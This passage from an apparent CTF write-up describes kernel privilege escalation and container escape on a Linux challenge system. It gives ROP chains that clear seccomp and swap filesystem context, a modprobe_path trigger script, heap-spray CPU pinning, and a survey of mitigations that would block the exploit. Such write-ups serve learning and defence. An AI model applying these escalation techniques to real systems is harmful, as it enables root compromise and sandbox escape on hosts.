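libc = ctypes.CDLL(None, use_errno=True)
SYS_getpid = 39  # x86-64; stand-in for the rarely-used syscall gdb traps

# Illustrative flag values, not the real helper's encoding.
FLAG_DISABLE_SECCOMP = 1 << 0
FLAG_TRIGGER_ROP = 1 << 1

def trigger(flags, extra=0):
    # The extra syscall arguments land in rdi/rsi, where the gdb
    # script reads them before simulating the privilege escalation.
    return libc.syscall(SYS_getpid, flags, extra)

print(trigger(FLAG_DISABLE_SECCOMP))
```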
<p>While this allows for convenient, vulnerability-independent development of those later stages in Python, there are some shortcomings, especially for ROP exploits. For instance, depending on the context that they hijack control flow in, it might be necessary to drop certain locks before returning to user space, or even to terminate a kernel thread in case the exploit takes control in a non-process context [<a href="https://www.offensivecon.org/speakers/2020/alexander-popov.html">24</a>]. In those cases, it might be necessary to simulate a situation more accurately with a vulnerability-dependent script.</p>

<p><img src="/media/Linux-S3/test_privesc.jpg" alt="" /></p>

<h3 id="rop-chain">ROP Chain</h3>
<p>Once an attacker has gained a code execution primitive, there are ample ways in which they might elevate their privileges. However, if the exploit context does not demand a more specialized approach, the go-to method of public exploits is to call <a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/cred.c#L437"><code class="language-plaintext highlighter-rouge">commit_creds</code></a>(<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/cred.c#L682"><code class="language-plaintext highlighter-rouge">prepare_kernel_cred</code></a>(0)) to become the root user in the root namespace, and <a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/nsproxy.c#L242"><code class="language-plaintext highlighter-rouge">switch_task_namespaces</code></a>(<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/pid.c#L420"><code class="language-plaintext highlighter-rouge">find_task_by_vpid</code></a>(1), <code class="language-plaintext highlighter-rouge">&amp;init_nsproxy</code>) to make the remaining root namespaces available to <code class="language-plaintext highlighter-rouge">setns</code> via procfs. To disable seccomp, which currently prevents us from using the <code class="language-plaintext highlighter-rouge">setns</code> system call, we can clear all our thread info flags. However, even after returning to user space and executing a shell, the <a href="https://man7.org/linux/man-pages/man1/nsenter.1.html"><code class="language-plaintext highlighter-rouge">nsenter</code></a> command, which is a <code class="language-plaintext highlighter-rouge">setns</code> wrapper, will still fail with a permission denied error. This is due to a code path in <code class="language-plaintext highlighter-rouge">fork</code> that sets the seccomp thread info flag for the child if the parent has a non-zero seccomp mode [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/fork.c#L1637">25</a>]. Thus, to get an unrestricted shell, we can use the following ROP chain, which also zeroes the seccomp mode.</p>
<pre><code class="language-Python">rop_seccomp: List[int] = [
   bpf_get_current_task,              # rax = current
   mov_dword_ptr_rax_0_ret,           # current-&gt;thread_info-&gt;flags = 0
   pop_rdi_ret,
   0x768,                             # rdi = offsetof(struct task_struct, seccomp)
   add_rax_rdi_ret,                   # rax = &amp;current-&gt;seccomp.mode
   mov_dword_ptr_rax_0_ret,           # current-&gt;seccomp.mode = 0
]
</code></pre>
<p>Another idea would be to avoid the <code class="language-plaintext highlighter-rouge">setns</code> detour entirely by performing its essential operations in the ROP chain. Two key operations are happening when changing mount namespaces via the <code class="language-plaintext highlighter-rouge">setns</code> system call. First, <code class="language-plaintext highlighter-rouge">setns-&gt;validate_nsset-&gt;validate_ns-&gt;mntns_install</code> changes the filesystem context of the calling thread to that of the namespace it is joining [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/namespace.c#L4111">26</a>]. Later, <code class="language-plaintext highlighter-rouge">setns-&gt;commit_nsset-&gt;switch_task_namespaces</code> updates the namespace recorded in the <code class="language-plaintext highlighter-rouge">task_struct</code>. Here, the first operation is the interesting one. In a crude approximation, we can try to simulate it by replacing our task’s filesystem context with a copy of the <code class="language-plaintext highlighter-rouge">init_fs</code> used by kernel threads and system processes.</p>
<pre><code class="language-Python">rop_fs: List[int] = [
   bpf_get_current_task,              # rax = current
   pop_rdi_ret,
   0x6E0,                             # rdi = offsetof(struct task_struct, fs)
   add_rax_rdi_ret,
   push_rax_pop_rbx_ret,              # rbx = &amp;current-&gt;fs ; callee saved
   pop_rdi_ret,
   init_fs,
   copy_fs_struct,                    # rax = copy_fs_struct(&amp;init_fs)
   mov_qword_ptr_rbx_rax_pop_rbx_ret, # current-&gt;fs = copy_fs_struct(&amp;init_fs)
   -1,
]
</code></pre>
<p>While this certainly leaves our task in a weird state, it does the job without causing system instability.</p>

<p>What remains is returning to user mode. We could either resume the kernel at the call site where we hijacked the control flow or skip the remaining syscall execution and take a shortcut back to user space. The former requires us to save and restore all callee-saved registers that were in use, but has the advantage that the kernel code takes care of all the rest. The latter requires careful inspection of the surrounding code to ensure that all necessary resources are released by the ROP chain, as well as a special plan for returning to user mode.</p>

<p>When exploiting pipe buffers for code execution, taking the shortcut variant requires no further adjustments, so that is what we will do. To understand how to leave kernel mode, it is best to start by looking into how it is entered. After switching to the kernel page tables {1} and stack {2}, the system call entry point contains some assembly macro magic to save the user mode CPU context to the bottom of the kernel stack {3} [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L95">27</a>].</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SYM_CODE_START</span><span class="p">(</span><span class="n">entry_SYSCALL_64</span><span class="p">)</span>
	<span class="n">UNWIND_HINT_EMPTY</span>

	<span class="n">swapgs</span>
	<span class="cm">/* tss.sp2 is scratch space. */</span>
	<span class="n">movq</span>	<span class="o">%</span><span class="n">rsp</span><span class="p">,</span> <span class="n">PER_CPU_VAR</span><span class="p">(</span><span class="n">cpu_tss_rw</span> <span class="o">+</span> <span class="n">TSS_sp2</span><span class="p">)</span>
	<span class="n">SWITCH_TO_KERNEL_CR3</span> <span class="n">scratch_reg</span><span class="o">=%</span><span class="n">rsp</span>  <span class="c1">// {1}</span>
	<span class="n">movq</span>	<span class="n">PER_CPU_VAR</span><span class="p">(</span><span class="n">cpu_current_top_of_stack</span><span class="p">),</span> <span class="o">%</span><span class="n">rsp</span> <span class="c1">// {2}</span>

<span class="n">SYM_INNER_LABEL</span><span class="p">(</span><span class="n">entry_SYSCALL_64_safe_stack</span><span class="p">,</span> <span class="n">SYM_L_GLOBAL</span><span class="p">)</span>

	<span class="cm">/* Construct struct pt_regs on stack */</span> <span class="c1">// {3}</span>
	<span class="n">pushq</span>	<span class="err">$</span><span class="n">__USER_DS</span>				<span class="cm">/* pt_regs-&gt;ss */</span>
	<span class="n">pushq</span>	<span class="n">PER_CPU_VAR</span><span class="p">(</span><span class="n">cpu_tss_rw</span> <span class="o">+</span> <span class="n">TSS_sp2</span><span class="p">)</span>	<span class="cm">/* pt_regs-&gt;sp */</span>
	<span class="n">pushq</span>	<span class="o">%</span><span class="n">r11</span>					<span class="cm">/* pt_regs-&gt;flags */</span>
	<span class="n">pushq</span>	<span class="err">$</span><span class="n">__USER_CS</span>				<span class="cm">/* pt_regs-&gt;cs */</span>
	<span class="n">pushq</span>	<span class="o">%</span><span class="n">rcx</span>					<span class="cm">/* pt_regs-&gt;ip */</span>
<span class="n">SYM_INNER_LABEL</span><span class="p">(</span><span class="n">entry_SYSCALL_64_after_hwframe</span><span class="p">,</span> <span class="n">SYM_L_GLOBAL</span><span class="p">)</span>
	<span class="n">pushq</span>	<span class="o">%</span><span class="n">rax</span>					<span class="cm">/* pt_regs-&gt;orig_ax */</span>

	<span class="n">PUSH_AND_CLEAR_REGS</span> <span class="n">rax</span><span class="o">=</span><span class="err">$</span><span class="o">-</span><span class="n">ENOSYS</span>
</code></pre></div></div>
<p>The complementary code is found a bit further down in the same file [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/entry/entry_64.S#L571">28</a>]. It starts by restoring <em>most</em> of the user-mode registers {4}, switches to a temporary stack {5}, copies the remaining registers over to the new stack {6}, switches back to user page tables {7}, and finally returns to user mode {8}.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="n">POP_REGS</span> <span class="n">pop_rdi</span><span class="o">=</span><span class="mi">0</span> <span class="c1">// {4}</span>

	<span class="cm">/*
	 * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
	 * Save old stack pointer and switch to trampoline stack.
	 */</span>
	<span class="n">movq</span>	<span class="o">%</span><span class="n">rsp</span><span class="p">,</span> <span class="o">%</span><span class="n">rdi</span> <span class="c1">// {5}</span>
	<span class="n">movq</span>	<span class="n">PER_CPU_VAR</span><span class="p">(</span><span class="n">cpu_tss_rw</span> <span class="o">+</span> <span class="n">TSS_sp0</span><span class="p">),</span> <span class="o">%</span><span class="n">rsp</span> <span class="c1">// {5}</span>
	<span class="n">UNWIND_HINT_EMPTY</span>

	<span class="cm">/* Copy the IRET frame to the trampoline stack. */</span> <span class="c1">// {6}</span>
	<span class="n">pushq</span>	<span class="mi">6</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* SS */</span>
	<span class="n">pushq</span>	<span class="mi">5</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* RSP */</span>
	<span class="n">pushq</span>	<span class="mi">4</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* EFLAGS */</span>
	<span class="n">pushq</span>	<span class="mi">3</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* CS */</span>
	<span class="n">pushq</span>	<span class="mi">2</span><span class="o">*</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>	<span class="cm">/* RIP */</span>

	<span class="cm">/* Push user RDI on the trampoline stack. */</span>
	<span class="n">pushq</span>	<span class="p">(</span><span class="o">%</span><span class="n">rdi</span><span class="p">)</span>

	<span class="cm">/*
	 * We are on the trampoline stack. All regs except RDI are live.
	 * We can do future final exit work right here.
	 */</span>
	<span class="n">STACKLEAK_ERASE_NOCLOBBER</span>

	<span class="n">SWITCH_TO_USER_CR3_STACK</span> <span class="n">scratch_reg</span><span class="o">=%</span><span class="n">rdi</span> <span class="c1">// {7}</span>

	<span class="cm">/* Restore RDI. */</span>
	<span class="n">popq</span>	<span class="o">%</span><span class="n">rdi</span>
	<span class="n">SWAPGS</span>
	<span class="n">INTERRUPT_RETURN</span> <span class="c1">// {8}</span>
</code></pre></div></div>
<p>What this teaches us is that the kernel’s interrupt return routine expects a particular stack layout, consisting of register values saved on syscall entry. Setting the CPU back to user mode then happens by executing an <a href="https://www.felixcloutier.com/x86/iret:iretd:iretq"><code class="language-plaintext highlighter-rouge">iretq</code></a> instruction, a complex instruction that, among other things, sets multiple registers from values stored on the stack. Luckily, the expected layout is described in a helpful comment {6}. Thus, by appending the following tail to our ROP chain, which transfers control directly to the stack switch {7} as we are not interested in restoring any general-purpose registers, we can return to a chosen user mode address.</p>
<pre><code class="language-Python">regs: gdb.Value = current_pt_regs()
rop_iret: List[int] = [
   swapgs_restore_regs_and_return_to_usermode + 22,
   int(regs["di"]), # rdi, was set to `flags` by user
   -1,             # rax, junk
   int(regs["si"]), # rip, was set to `&amp;return_to_here` by user
   int(regs["cs"]),
   int(regs["flags"]),
   int(regs["sp"]),
   int(regs["ss"]),
]
</code></pre>
<p>Here, the gdb script is using the kernel-saved register values for convenience; however, the final exploit can simply read them with the appropriate CPU instructions when building the ROP chain [<a href="https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rop.c#L112">29</a>]. With all general-purpose registers being clobbered by the irregular syscall return and the new stack being empty, the user mode function we return to should not expect any arguments and never return itself.</p>

<p>To debug the ROP-based privilege escalations, we can combine the different pieces into the full chain and then run the user mode helper with the <code class="language-plaintext highlighter-rouge">-r</code> flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ test_privesc -r -- bash
</code></pre></div></div>

<h3 id="read-write">Read-Write</h3>
<p>A common data-only privilege escalation technique is to overwrite the <code class="language-plaintext highlighter-rouge">modprobe_path</code> variable. It holds the filesystem path of a program that the kernel will execute via <code class="language-plaintext highlighter-rouge">search_binary_handler-&gt;__request_module-&gt;call_modprobe</code> whenever it cannot find a handler to launch an executable file supplied to the <code class="language-plaintext highlighter-rouge">execve</code> syscall, i.e., the file starts with unknown magic bytes [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/kmod.c#L93">30</a>]. The program will be executed in the root namespaces as the root user. When using this technique for container escapes, we overwrite the variable with the path to a program or script we control. Note, however, that we need a path that is valid in the <em>root</em> mount namespace. Such a path can, for example, be constructed from the first entry of <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/mounts</code>.</p>
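<p>For completeness, the user space trigger is tiny: execute a file whose first bytes are non-printable and match no registered binfmt handler, so that <code class="language-plaintext highlighter-rouge">search_binary_handler</code> falls through to <code class="language-plaintext highlighter-rouge">request_module</code>. A sketch, assuming the kernel-side path overwrite has already happened:</p>

```python
import os
import tempfile

def write_trigger(path):
    # Four non-printable bytes that no binfmt handler claims.
    with open(path, "wb") as f:
        f.write(b"\xff\xff\xff\xff")
    os.chmod(path, 0o755)

def exec_errno(path):
    # execve fails with ENOEXEC, but only after the kernel asked
    # modprobe for a "binfmt-ffff" module, i.e., after our planted
    # program already ran as root in the root namespaces.
    try:
        os.execv(path, [path])
    except OSError as e:
        return e.errno

with tempfile.TemporaryDirectory() as d:
    path = os.path.join(d, "trigger")
    write_trigger(path)
    print(exec_errno(path))
```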

<p>However, the challenge kernel is built with <code class="language-plaintext highlighter-rouge">CONFIG_STATIC_USERMODEHELPER</code>, which forces all invocations of user mode programs through a fixed path [<a href="https://www.kernelconfig.io/config_static_usermodehelper?arch=x86&amp;kernelversion=6.3.12">31</a>]. Using the above technique would therefore require writing to kernel read-only mappings, which we cannot do with our pipe-based read-write primitive, as the kernel rodata and text segments are also marked read-only in the direct map. Thus, we can either upgrade to a page table-based read-write primitive or look for another way.</p>

<p>Being uncreative and lazy, I simply opted for replicating the ROP privilege escalations with the read-write primitive. Being even more lazy, I did not even bother searching for the namespace’s pid 1, but rather overwrote the mount namespace of the current task, and then used <code class="language-plaintext highlighter-rouge">setns</code> on <code class="language-plaintext highlighter-rouge">/proc/self/ns/mnt</code>. Imitating the other ROP-based privilege escalation can be done by simply setting <code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;{root,pwd}</code> to those of the <code class="language-plaintext highlighter-rouge">init_fs</code>, which is morally equivalent to the copy operation. The gdb script and user mode helper can be used for debugging the former</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ test_privesc -n -u -c -s -- bash
</code></pre></div></div>
<p>and the latter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ test_privesc -c -m -- bash
</code></pre></div></div>

<h3 id="final-exploit">Final Exploit</h3>
<p>Integrating the Python prototypes into the final exploit is straightforward. In the last post, we already created abstractions that allow for convenient reading and writing of kernel memory. With those the corresponding privilege escalations are easy to implement. See the <a href="https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rw_pipe_and_tty.c"><code class="language-plaintext highlighter-rouge">rw_pipe_and_tty</code> module</a> of the exploit library for details. Furthermore, we already set up everything for executing a ROP chain. The code that builds it can be found in the <a href="https://github.com/vobst/ctf-corjail-public/blob/master/libexp/rop.c"><code class="language-plaintext highlighter-rouge">rop</code> module</a>.</p>

<h2 id="mitigations">Mitigations</h2>
<p>It is worrying that a single null byte written out-of-bounds is enough to allow a sandboxed process to compromise the entire system - but surely the CTF challenge was not representative of an actual Linux system, right? Mitigations are meant to reduce the exploitability of one or more bug classes, i.e., they should make it harder for an attacker to write an exploit for a particular bug of that class. Most of the mitigations available in the x64 mainline kernel were in fact active on the challenge system. We can use the <code class="language-plaintext highlighter-rouge">kconfig-hardened-check</code> tool to check if any crucial mitigations are missing and compare it to the vanilla Arch Linux kernel as well as its hardened version [<a href="https://github.com/a13xp0p0v/kconfig-hardened-check">32</a>].</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ kconfig-hardened-check -c /usr/src/linux/.config | tail -n 1
[+] Config check is finished: 'OK' - 91 / 'FAIL' - 92
$ kconfig-hardened-check -c /usr/src/linux-hardened/.config | tail -n 1
[+] Config check is finished: 'OK' - 124 / 'FAIL' - 59
$ kconfig-hardened-check -c kernel_root/linux-5.10.127_x86_64_corjail/.config | tail -n 1
[+] Config check is finished: 'OK' - 106 / 'FAIL' - 77
</code></pre></div></div>
<p>It will be instructive to look back at the exploit and record which mitigations we bypassed, and how we did that. We will not cover all mitigations, see the Linux Kernel Defense Map to get an idea of further mitigations [<a href="https://github.com/a13xp0p0v/linux-kernel-defence-map">33</a>]. Furthermore, we will discuss some mitigations that have been implemented elsewhere and would have prevented our exploit in its current form.</p>

<p>The exploit primitive was a linear heap overflow. Slab freelist randomization is meant to mitigate such bugs [<a href="https://mxatone.medium.com/randomizing-the-linux-kernel-heap-freelists-b899bb99c767">34</a>]. It added some inevitable non-determinism to our exploit, limiting its theoretical success rate to about 95.2%. We were able to get close to this theoretical maximum by combining common exploit stabilization techniques like defragmentation, heap grooming, CPU pinning, and multi-process heap sprays to reliably create the desired heap state [<a href="https://www.usenix.org/conference/usenixsecurity22/presentation/zeng">35</a>].</p>
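<p>Of those techniques, CPU pinning is the cheapest to apply: keeping all spray and trigger threads on one CPU ensures they allocate from the same per-CPU slabs and freelists. A minimal sketch:</p>

```python
import os

def pin_to_cpu(cpu=None):
    # Default to the first CPU this task may run on, so the sketch
    # also works inside a cgroup-restricted cpuset.
    if cpu is None:
        cpu = min(os.sched_getaffinity(0))
    os.sched_setaffinity(0, {cpu})
    return cpu

print(pin_to_cpu())
```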

<p>It is worth mentioning, however, that there are other mitigations that would have stopped us dead in our tracks at this point.</p>

<p>One category can be summarized as cache isolation based mitigations. The general idea is to reduce the set of victim objects by splitting allocations across more caches. For example, recall that the cache serving a kmalloc call was selected based on the allocation size and flags, where the latter were used to choose one of four different caches (“normal”, “dma”, “reclaimable”, “cgroup”). Starting with Linux 6.6, an additional dimension was added to the cache matrix. For “normal” allocations, the address of the kmalloc call site will be combined with a per-boot random token, and the hash of this will be used to select one of N equivalent caches to serve the allocation [<a href="https://lwn.net/Articles/938637/">36</a>]. This would introduce an unacceptable factor of 1/N to the exploit success rate since we need filter and poll list allocations to land in the same cache. Furthermore, it makes heap state manipulations harder, as we do not know if two kmalloc calls will manipulate the same cache. Potentially, one could try to leak this bit of information through correlating allocation timings similar to previous work [<a href="https://www.usenix.org/conference/usenixsecurity23/presentation/lee-yoochan">37</a>]. The overflow could still work reliably as a cross-cache overflow, where we would try to spray slabs full of poll lists in the hope that they end up next to a slab ending in a filter. Similarly, grsecurity’s AUTOSLAB, among other things, implements cache isolation of all allocation sites [<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">38</a>] and Google’s custom hardening patches (used to) isolate elastic objects in a separate cache [<a href="https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README">39</a>].</p>
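<p>A toy model illustrates the 1/N factor. The hash, constants, and call site addresses below are stand-ins for illustration, not the kernel’s actual implementation:</p>

```python
import random

N = 16  # number of equivalent "normal" kmalloc caches (illustrative)
boot_seed = random.getrandbits(64)  # re-rolled on every boot

def cache_index(call_site):
    # The kernel mixes the kmalloc call site address with a per-boot
    # random token; this tuple hash is only a stand-in.
    return hash((call_site, boot_seed)) % N

# Hypothetical call sites for the victim (filter) and spray (poll
# list) allocations; they share a cache only ~1/N of the time.
victim_site = 0xFFFFFFFF8133F0A0
spray_site = 0xFFFFFFFF812C1B50
print(cache_index(victim_site) == cache_index(spray_site))
```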

<p>Another category of overflow mitigations is memory tagging based [<a href="https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html">40</a>]. For example, the ARM implementation of the Kernel Address Sanitizer (KASAN) supports a hardware-assisted mode that is meant to be used as a mitigation against heap overflow, UAF, and double-free bugs in production [<a href="https://www.youtube.com/watch?v=UwMt0e_dC_Q">41</a>].</p>

<p>Next, we performed an arbitrary free through a partial pointer overwrite. Obviously, memory tagging could be used as a probabilistic mitigation here as well, since the tag of the pointer that is freed will probably not match the tag of the memory it points to. Software mitigations exist as well. For example, grsecurity kernels add random padding to the beginning of each new slab [<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">38</a>]. This might lead to a misaligned free, causing further degradation of exploit reliability, as we can no longer be sure that the pointed-to QWORD is zero.</p>

<p>Use-after-free scenarios are a strong exploit primitive, and thus it is unsurprising that many mitigations try to make them less exploitable. Again, memory tagging based mitigations are an obvious option to detect such situations. One might think that cache isolation based mitigations might be effective here as well, as they cut down the set of objects available for creating type confusions. However, they are easily bypassed by handing the page with the vulnerable object back to the Page Allocator. Grsecurity’s random slab padding might help in the sense that objects cannot be deterministically overlapped because the new slab might have another padding. However, when reclaiming with objects like user page tables, or other types of arrays, the mitigation becomes much less useful. A more promising mitigation, in my opinion, is the one Google’s Jann Horn is currently working to upstream. It deterministically prevents reclaiming via slab page reuse by making it impossible to reuse virtual memory that was once assigned to a cache for anything but slabs of that cache [<a href="https://github.com/thejh/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e">42</a>]. In particular, he moves slab allocations to their own virtual memory region, where he can implement strict cache memory isolation without causing unacceptable overhead, by deallocating the underlying physical memory, something that is not possible in the direct map. Needless to say, randomized cache isolation in combination with strict reuse prevention would have killed the whole UAF part of our exploit.</p>

<p>Moving on to the control flow hijacking part, we enter the world of forward-edge control flow integrity (CFI) enforcement. With any common form of CFI, the code path that we used to gain code execution would have roughly looked like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">pipe_buf_release</span><span class="p">(</span><span class="k">struct</span> <span class="n">pipe_inode_info</span> <span class="o">*</span><span class="n">pipe</span><span class="p">,</span>
                                   <span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span>
<span class="p">{</span>
   <span class="k">const</span> <span class="k">struct</span> <span class="n">pipe_buf_operations</span> <span class="o">*</span><span class="n">ops</span> <span class="o">=</span> <span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">;</span>
   <span class="n">buf</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

   <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">release</span><span class="p">)(</span><span class="k">struct</span> <span class="n">pipe_inode_info</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="o">*</span><span class="p">)</span> <span class="o">=</span> <span class="n">ops</span><span class="o">-&gt;</span><span class="n">release</span><span class="p">;</span>
   <span class="k">if</span> <span class="p">(</span><span class="n">is_valid_indirect_call_target</span><span class="p">(</span><span class="n">release</span><span class="p">))</span>
       <span class="n">release</span><span class="p">(</span><span class="n">pipe</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
   <span class="k">else</span>
       <span class="n">panic</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<p>What <code class="language-plaintext highlighter-rouge">is_valid_indirect_call_target</code> does varies depending on the concrete CFI implementation and may be a pure software construct or assisted by hardware features. For example, Windows uses compiler instrumentation [<a href="https://en.wikipedia.org/wiki/Control-flow_integrity#Microsoft_Control_Flow_Guard">43</a>] while iOS uses pointer authentication [<a href="https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html">44</a>]. While those mitigations are regularly bypassed by exploits on these platforms, they do raise the bar for getting initial code execution and would have required us to put in additional effort [<a href="https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf">45</a>].</p>

<p>Continuing with our ROP chain, we profited from the absence of back-edge CFI in the challenge kernel. While hardware shadow stacks might soon mitigate ROP exploits in user space on x64 [<a href="https://lwn.net/Articles/926649/">46</a>] and arm64 [<a href="https://lwn.net/Articles/940403/">47</a>], activation of this feature in kernel mode is nowhere in sight. On other platforms, return address signing would have prevented our ROP chain from running without first finding a way to sign it [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/arm64/Kconfig#L1510">48</a>].</p>

<p>Another thing that might have caught our ROP exploit could have been some form of runtime security checking. For example, the Linux Kernel Runtime Guard (LKRG) project has an exploit detection (ED) module that includes checks looking for an illicit modification to a task’s credentials [<a href="https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1215">49</a>], namespaces [<a href="https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1363">50</a>], or seccomp status [<a href="https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1382">51</a>]. If its hooks manage to catch a task in the middle of a ROP chain, the ED module will also detect that the stack pointer is not within a sane region [<a href="https://github.com/lkrg-org/lkrg/blob/47191f9b29ae22fe703c52993416824ef7fa29ec/src/modules/exploit_detection/p_exploit_detection.c#L1326">52</a>] and kill the offending task. While it is certainly possible to bypass [<a href="https://a13xp0p0v.github.io/2021/08/25/lkrg-bypass.html">53</a>] [<a href="https://github.com/milabs/lkrg-bypass">54</a>], it would have caught our exploit in its current form. In general, I think it is valuable against off-the-shelf exploits not targeted towards a specific user’s environment.</p>
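<p>The principle behind such a credential-integrity check can be modeled in a few lines of user-space C. The sketch below is illustrative only (all names are invented; it is not LKRG code): credentials are shadowed at a trusted point, and a hook later compares the live values against the shadow, flagging any modification that bypassed the legitimate update path.</p>

```c
#include <assert.h>
#include <string.h>

/* Illustrative user-space model of an LKRG-style integrity check (invented
 * names, not actual LKRG code): snapshot a task's credentials at a trusted
 * point, then compare the live copy against the snapshot inside hooks. */
struct creds { unsigned int uid, gid; };

struct task {
    struct creds live;   /* what the "kernel" currently uses */
    struct creds shadow; /* copy taken when the task was last validated */
};

/* Called on legitimate credential changes, e.g., a successful setuid(). */
static void snapshot_creds(struct task *t)
{
    t->shadow = t->live;
}

/* Returns nonzero if the live credentials were modified without going
 * through the snapshotting update path, i.e., by a data-only exploit. */
static int creds_tampered(const struct task *t)
{
    return memcmp(&t->live, &t->shadow, sizeof(struct creds)) != 0;
}
```

A real implementation additionally has to protect the shadow copies themselves, which is why LKRG keeps them in a hash-protected database.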

<p>Of course, the reason we had to resort to ROP in the first place was to bypass Data Execution Prevention (DEP) and Supervisor Mode Execution Prevention (SMEP), which prevented us from using shellcode or jumping into user space code, respectively. By placing the ROP chain in kernel memory, we also bypassed Supervisor Mode Access Prevention (SMAP), which prevented us from placing the ROP chain in user space memory.</p>

<p>Other operating systems also have mitigations targeted towards kernel read-write primitives. For example, Apple’s ARM processors have a proprietary hardware feature that enables creating a security boundary within the kernel, making page tables read-only for most kernel code [<a href="https://blog.siguza.net/APRR/">55</a>]. Furthermore, iOS also uses PAC to protect the integrity of some data structures, e.g., the thread state [<a href="https://www.google.com/url?q=https://bazad.github.io/presentations/BlackHat-USA-2020-iOS_Kernel_PAC_One_Year_Later.pdf&amp;sa=U&amp;ved=2ahUKEwiIg_GSgteAAxWzK7kGHYCgCdUQFnoECAoQAg&amp;usg=AOvVaw12Yeao3WAUNwGg03EwzZib">56</a>]. Windows, on the other hand, uses a hypervisor-based approach, e.g., to preserve code integrity properties despite attackers having a kernel read-write primitive [<a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">57</a>]. Many mobile Linux environments also employ hypervisor-based integrity mechanisms, e.g., Samsung Real-time Kernel Protection is active on the vendor’s Android devices [<a href="https://www.samsungknox.com/en/blog/real-time-kernel-protection-rkp">58</a>] [<a href="https://googleprojectzero.blogspot.com/2017/02/lifting-hyper-visor-bypassing-samsungs.html">59</a>]. Efforts exist to bring such support to the Linux mainline [<a href="https://github.com/heki-linux">60</a>]. While some of those implementations would have caught our exploit’s modification of critical data structures like credentials, they are mostly targeted at post-exploitation and persistence.</p>

<h2 id="conclusions">Conclusions</h2>
<p>This closing look at other mitigations and platforms helps to put things in perspective. Our efforts up to this point are still child’s play and only scratch the very surface of the current kernel exploitation game, completely ignoring the field of post-exploitation, which is much more relevant in practice.</p>

<p>However, this whole series was only ever meant to be an entry point into the field and <em>that</em> goal has certainly been reached. Furthermore, it has also made clear in which direction the further learning process should be directed, so stay tuned for season two.</p>

<h2 id="references">References</h2>

<p>[0] https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html</p>

<p>[1] https://blog.eb9f.de/2023/08/05/Linux-S1-E2.html</p>

<p>[2] https://github.com/vobst/ctf-corjail-public</p>

<p>[3] https://github.com/vobst/like-dbg-fork-public</p>

<p>[5] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/seccomp.c#L942</p>

<p>[6] https://elixir.bootlin.com/linux/v5.10.127/source/kernel/entry/common.c#L57</p>

<p>[7] https://docs.docker.com/engine/security/seccomp/</p>

<p>[8] https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/blob/master/pwn/corjail/task/chall/seccomp.json</p>

<p>[9] https://security.googleblog.com/2023/06/learnings-from-kctf-vrps-42-linux.html</p>

<p>[10] https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html</p>

<p>[11] https://www.willsroot.io/2022/01/cve-2022-0185.html</p>

<p>[12] https://syst3mfailure.io/wall-of-perdition/</p>

